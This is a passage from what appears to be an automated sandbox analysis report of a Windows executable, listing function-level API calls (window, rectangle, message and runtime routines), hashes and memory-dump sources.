                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Empty$ClientOffset
                                                              • String ID:
                                                              • API String ID: 2342594873-0
                                                              • Opcode ID: 64a6f9e07721aaf9ac2563e72a5d1fa66480e729e83e784c0cf3a16580514591
                                                              • Instruction ID: e8c8cb1a6f269914c93104c5c78d5ed7ffe0da59ce3fae0a14a04accaa0230dc
                                                              • Opcode Fuzzy Hash: 64a6f9e07721aaf9ac2563e72a5d1fa66480e729e83e784c0cf3a16580514591
                                                              • Instruction Fuzzy Hash: A361F571A0061A9FCF11DFB8C9849EEBBF6BF49300F15456AE815EB240DB71A905CF60
                                                              APIs
                                                              • SetRectEmpty.USER32(?), ref: 00532196
                                                              • IsRectEmpty.USER32(?), ref: 005321AF
                                                              • GetClientRect.USER32(?,?), ref: 005321C7
                                                              • SetRectEmpty.USER32(?), ref: 005321DD
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                                • Part of subcall function 004FE373: CharUpperW.USER32(?,00000026,00000000), ref: 004FE3EB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Empty$CharClientException@8H_prolog3ThrowUpper
                                                              • String ID:
                                                              • API String ID: 1382499863-0
                                                              • Opcode ID: 1b2b8b3ec5db01527d8f323174d8c276f412cb44495f789683cd36685403b521
                                                              • Instruction ID: 94610383a374719e7e1abfe42b4cff0e865a8f71913f974501946f45e492426d
                                                              • Opcode Fuzzy Hash: 1b2b8b3ec5db01527d8f323174d8c276f412cb44495f789683cd36685403b521
                                                              • Instruction Fuzzy Hash: D6615A71A0060A9FCB00DFE9C984AEEBBF5BF48314F14456EE515E7291CB34A941CF54
                                                              APIs
                                                              • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 0051C2D8
                                                              • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 0051C31E
                                                              • RedrawWindow.USER32(?,00000000,00000000,00000185), ref: 0051C32E
                                                              • IsWindowVisible.USER32(?), ref: 0051C3D3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$RedrawVisible
                                                              • String ID:
                                                              • API String ID: 2376333906-0
                                                              • Opcode ID: 547d97a890ca0024d69b92de7e8c6c5222c8660cb910377b8c084a3f8cc6e6cc
                                                              • Instruction ID: 494a7daff8f15066dcb466a518067d06ef45a782018a34743f6d21d5c3060f36
                                                              • Opcode Fuzzy Hash: 547d97a890ca0024d69b92de7e8c6c5222c8660cb910377b8c084a3f8cc6e6cc
                                                              • Instruction Fuzzy Hash: E751B531240600EFD7219F65C889EBA7FB6FF84B00B24496DF5568B651DB36ED80DB50
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Empty$OffsetWindow
                                                              • String ID:
                                                              • API String ID: 3444667153-0
                                                              • Opcode ID: 38de5a56d5e8b9daa37df3e4fe195e61a33915f368f25dea5f7a6cefbf9fc783
                                                              • Instruction ID: 7d96df58d25564087ff040ce5b1c0695dc3a2640d594a0cc272ef54833719de7
                                                              • Opcode Fuzzy Hash: 38de5a56d5e8b9daa37df3e4fe195e61a33915f368f25dea5f7a6cefbf9fc783
                                                              • Instruction Fuzzy Hash: 99510571D0061ADFCF20DFA8C894AEEBFB5BB48712F14452AE916A7200D770AE44CF95
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$CopyEmptyWindow
                                                              • String ID:
                                                              • API String ID: 2176940440-0
                                                              • Opcode ID: a4d4ac5cf1fb1dd0569a5a947cf469e7c4191499e1431b1f1e09036ad5f9cfb6
                                                              • Instruction ID: 263ab95285baa6be26154bf043cf7545a68a4073cd95823cc48b459506ee7c85
                                                              • Opcode Fuzzy Hash: a4d4ac5cf1fb1dd0569a5a947cf469e7c4191499e1431b1f1e09036ad5f9cfb6
                                                              • Instruction Fuzzy Hash: 5F51C5B5D01619AFCF10EFA9D9848EEFBB9FB88700B24451AE805B7210D7746E45CFA1
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: File$SizeTime_memset
                                                              • String ID:
                                                              • API String ID: 151880914-0
                                                              • Opcode ID: cb46187054a4dacbbcf5cb6337e7393ff2a95a2fd2d39118922b08a9c6584742
                                                              • Instruction ID: d399c0bebaa7ee93f01b204f5af22dee016842ae07d554630f692efb258727ba
                                                              • Opcode Fuzzy Hash: cb46187054a4dacbbcf5cb6337e7393ff2a95a2fd2d39118922b08a9c6584742
                                                              • Instruction Fuzzy Hash: 99514EB1900605EFDB20DFA5D995CAABBF8FF083147148A2EE166D7690E730E944CF94
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 005AF7B5
                                                              • SendMessageW.USER32(?,00000146,00000000,00000000), ref: 005AF91C
                                                              • SendMessageW.USER32(?,00000150,?,00000000), ref: 005AF968
                                                              • SendMessageW.USER32(?,00000146,00000000,00000000), ref: 005AF99A
                                                                • Part of subcall function 004DB128: __EH_prolog3_GS.LIBCMT ref: 004DB132
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$H_prolog3H_prolog3_
                                                              • String ID:
                                                              • API String ID: 1270747201-0
                                                              • Opcode ID: c185168c6e1773ecd48ad1a48cc9a69f8de475eb865bbaeecc0584aeff4479b4
                                                              • Instruction ID: 9bdde3b7cc7da322992e823b8627839d3472f50592fbe8bb00e705abcdcf735a
                                                              • Opcode Fuzzy Hash: c185168c6e1773ecd48ad1a48cc9a69f8de475eb865bbaeecc0584aeff4479b4
                                                              • Instruction Fuzzy Hash: 3B515C31200B059FDB11EF75C895FAEBBE5BF44304F00482EB59BA72A2DB74AA45CB54
                                                              APIs
                                                              • CreateCompatibleDC.GDI32(?), ref: 0054F119
                                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0054F133
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                                • Part of subcall function 004E066D: SelectObject.GDI32(?,?), ref: 004E0678
                                                              • FillRect.USER32(?,00000000,?), ref: 0054F191
                                                              • GetObjectW.GDI32(?,00000018,?), ref: 0054F1C6
                                                                • Part of subcall function 005B646F: __EH_prolog3.LIBCMT ref: 005B6476
                                                                • Part of subcall function 005B646F: GetObjectW.GDI32(00000005,00000018,?), ref: 005B6564
                                                                • Part of subcall function 0053F436: __EH_prolog3_catch.LIBCMT ref: 0053F43D
                                                                • Part of subcall function 0053F436: FindResourceW.KERNEL32(?,?,00000005,00000024,0054EE2A,?,?,?), ref: 0053F473
                                                                • Part of subcall function 0053F436: LoadResource.KERNEL32(?,00000000,?,?), ref: 0053F47B
                                                                • Part of subcall function 0053F436: LockResource.KERNEL32(?,00000024,0054EE2A,?,?,?), ref: 0053F48C
                                                                • Part of subcall function 0054EB85: __EH_prolog3.LIBCMT ref: 0054EB8C
                                                                • Part of subcall function 0054EB85: ~_Task_impl.LIBCPMT ref: 0054EBD0
                                                                • Part of subcall function 0054EB85: ~_Task_impl.LIBCPMT ref: 0054EBDF
                                                                • Part of subcall function 0054EB85: ~_Task_impl.LIBCPMT ref: 0054EBEE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3ObjectResourceTask_impl$CompatibleCreate$BitmapException@8FillFindH_prolog3_catchLoadLockRectSelectThrow
                                                              • String ID:
                                                              • API String ID: 4119110093-0
                                                              • Opcode ID: 64c16a8ebcc3fdc8cee97a987159aef35587a93e0bbc123b64f835d08fe88a32
                                                              • Instruction ID: 37ffcb65cc26d0d6845cc289621e81cb5410c4886e1d5e48c68b0f765cc01a5d
                                                              • Opcode Fuzzy Hash: 64c16a8ebcc3fdc8cee97a987159aef35587a93e0bbc123b64f835d08fe88a32
                                                              • Instruction Fuzzy Hash: 0F519E75900298AFDB11EB65CC55BEEBBB9FF49304F1041DAE806A3281DBB45E84CF61
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 004EC599
                                                              • SendDlgItemMessageA.USER32(?,?,?,00000000,?), ref: 004EC6E5
                                                                • Part of subcall function 004D8E6A: _malloc.LIBCMT ref: 004D8E88
                                                              • SendDlgItemMessageW.USER32(?,?,0000040B,00000000,00000001), ref: 004EC671
                                                                • Part of subcall function 00515BA3: __EH_prolog3.LIBCMT ref: 00515BAA
                                                              • SendDlgItemMessageW.USER32(?,?,0000037C,?,?), ref: 004EC6A3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ItemMessageSend$H_prolog3$_malloc
                                                              • String ID:
                                                              • API String ID: 2480034192-0
                                                              • Opcode ID: 69ff95e3f6c6293ce85549f6901b673ee1edc2c48408e29f2e42e919aca3fb9c
                                                              • Instruction ID: 51fe52336b49f098398f53b2b3024386c8afa911bdb5a8f6cb33ea1d3ef641d6
                                                              • Opcode Fuzzy Hash: 69ff95e3f6c6293ce85549f6901b673ee1edc2c48408e29f2e42e919aca3fb9c
                                                              • Instruction Fuzzy Hash: 3141D371900185ABDF209F66CC84ABF3AB5FF90325F50421BF961AA2D0DB384E43D758
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                              • String ID:
                                                              • API String ID: 2782032738-0
                                                              • Opcode ID: 9fb5eafde9ac0169d79dbd6bd5820b39befd159722b1eca9078c5386278874eb
                                                              • Instruction ID: be5b7f6d8d85c6cc2ebd0c94ce88688a8c97211d55b206c920c443f1ce08f905
                                                              • Opcode Fuzzy Hash: 9fb5eafde9ac0169d79dbd6bd5820b39befd159722b1eca9078c5386278874eb
                                                              • Instruction Fuzzy Hash: A1416D71A006059FDB249FE98984FAEBFB5FF80360B24853DE419D7650E770AE81DB60
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 005247BE
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                                • Part of subcall function 004DBB21: __EH_prolog3_catch.LIBCMT ref: 004DBB28
                                                              • GetWindowRect.USER32(?,?), ref: 005248B2
                                                              • GetSystemMetrics.USER32(00000010), ref: 005248C0
                                                              • GetSystemMetrics.USER32(00000011), ref: 005248CB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: MetricsSystem$Exception@8H_prolog3H_prolog3_H_prolog3_catchRectThrowWindow
                                                              • String ID:
                                                              • API String ID: 3575448974-0
                                                              • Opcode ID: 5771e3ccf3d4d8fc3a8e8da939f1fd39fdac87603f635eb7a9ab72dfd0b44485
                                                              • Instruction ID: 10d8a41e464e4708744a9713a462192d021e6b370f994d0258d3eef9d2738ab2
                                                              • Opcode Fuzzy Hash: 5771e3ccf3d4d8fc3a8e8da939f1fd39fdac87603f635eb7a9ab72dfd0b44485
                                                              • Instruction Fuzzy Hash: 67415A71A006159FCB14EFA5C895AEEBBF5FF48300F14446EF906AB291CB74A944CF50
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 005529A4
                                                              • EqualRect.USER32(?,?), ref: 005529CA
                                                              • BeginDeferWindowPos.USER32(?), ref: 005529D7
                                                              • EndDeferWindowPos.USER32(?), ref: 005529FD
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$DeferRect$BeginEqualException@8H_prolog3Throw
                                                              • String ID:
                                                              • API String ID: 2548128233-0
                                                              • Opcode ID: 53a885cf31758a800b08478791cc563c6492738a1466ed4c6f4073d66161e9d0
                                                              • Instruction ID: 38d0d7bfda17595bea45f6f5b20e9188ce6c9f1d2b237ea57db67ef6014e1aa7
                                                              • Opcode Fuzzy Hash: 53a885cf31758a800b08478791cc563c6492738a1466ed4c6f4073d66161e9d0
                                                              • Instruction Fuzzy Hash: 29416D71A002099FCF11DFA5C8948EEBFF9FF99311F14456AE902AB211DB71A944CF50
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: EmptyRect
                                                              • String ID:
                                                              • API String ID: 2270935405-0
                                                              • Opcode ID: 322ddb81817e403fda8e5b9d754efb508404bb8429a0519bec94db053e106759
                                                              • Instruction ID: ba1e05819be8c5dd071d5a1362bde0588dfa94de0ee47c3d56d3d0ce82a8e5d6
                                                              • Opcode Fuzzy Hash: 322ddb81817e403fda8e5b9d754efb508404bb8429a0519bec94db053e106759
                                                              • Instruction Fuzzy Hash: 9C519DB1805B858ED360DF3AC5806E6FAE9BFA5314F104E2FD0AED2261D7B065819F54
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Window$EqualParent
                                                              • String ID:
                                                              • API String ID: 2870910800-0
                                                              • Opcode ID: da88d61e6379f0dba2d09fed87515a927dda32423bedd3aba34e8e76f42d5fc9
                                                              • Instruction ID: 278257fc3f1e765b81d01e732981694c7a43f42299edb7a9077c0d07d022d369
                                                              • Opcode Fuzzy Hash: da88d61e6379f0dba2d09fed87515a927dda32423bedd3aba34e8e76f42d5fc9
                                                              • Instruction Fuzzy Hash: E9416D75A01209DFCF10DFA5C894ABEBBB9FF49701F15056AE905EB210DB34AD44DBA0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ClientScreenWindow
                                                              • String ID:
                                                              • API String ID: 1643562046-0
                                                              • Opcode ID: c7efd940d8222c2077335162f90ebac9e2d43f77995607443722908dc778a7ed
                                                              • Instruction ID: 200b3221fde75f35f57cbb4a5339bb304a431c00c18410956a4e6ace77bf152a
                                                              • Opcode Fuzzy Hash: c7efd940d8222c2077335162f90ebac9e2d43f77995607443722908dc778a7ed
                                                              • Instruction Fuzzy Hash: BB41E471500209BAEF259F54CD84EBF7BA5FF08340F10446BEA45D6261EBB9DD40DB14
                                                              APIs
                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 005E0870
                                                              • __isleadbyte_l.LIBCMT ref: 005E08A3
                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,?,?,00000000,?,?,?), ref: 005E08D4
                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000,?,?,?), ref: 005E0942
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
